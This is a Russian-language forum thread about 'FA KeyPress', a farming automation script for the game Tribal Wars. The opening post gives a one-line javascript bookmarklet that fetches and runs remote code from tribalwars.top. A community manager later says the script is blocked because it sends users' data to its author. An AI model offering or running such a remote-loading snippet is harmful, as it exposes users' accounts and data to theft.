FA KeyPress by Crimsoni

Vezunchik

Мечник
Оценка реакций
0
javascript:cookieName="fakeypress";$.getScript('https://www.tribalwars.top/tribalwars/FAKeypress.js');void(0);

Для тех у кого не переключались деревни...
Здесь всё работает
 

DeletedUser44838

Гость
Чет не хочет он у меня не в одном варианте работать(
 

DeletedUser42142

Гость
эм, наверно пропустил все, втык получил по этой теме а тут потерли все:)
Было 2 скрипта, факей и кримнсон, оба с нетсервера, оба на фарм, идеи украли у скриптодедов с ру но результат отличный:) Факей ручной скрипт на с 1/3 автоматическими функциями, кримсон модернизтрованый, автоматический аналог факея с расширенными функциями, игроки пользовпнись жтими скриптами около года, пока до админов дошло что кримсон при 1 условии автоматизирует фарм:) полностью. И тут на ру я услышал сказочки от адмтнов типо того что данный скрипт крадет данные пользователей и прочее и прочую муру.
Алесей. Ну почему вам трудно было сказать сразу и всем, данный скрипт автоматизирон и потому запрещен!
Зачем надо было придумыаать небылицы?
 

DeletedUser45118

Гость
У меня тоже перестал роботать, по сообщениям више я понял что этот скрипт запрещен??
 

Bear

Комьюнити менеджер
Член команды
Комьюнити менеджер
Оценка реакций
1.029
Скрипт не запрещён, то, что написал кому вниз это лично его эротические фантазии :)
Когда автор скрипта уберёт из него функционал, который отправляет ему данные пользователя, тогда мы его сразу же разблокируем, если этого ещё не произошло
 

DeletedUser45167

Гость
скрипт нравится, но есть одно большое и жирное НО, ну а я надеюсь что это не НО а просто я подтупливаю к вечеру

возможно ли в скрипте сделать так чтобы отображались варварки на которые я УЖЕ нападаю??? У меня не получается почему-то...(
 

Deleted User - 40040

Гость
Короче ошибка сегодня появилась при выполнении скрипта.
При нажатии клавиши "J" - первая дерка из списка сдвигается и становится сбоку.
Очень неудобная лажа.
Браузер - Mozilla
В хроме такая же фигня.

error-2.jpg
 
Верх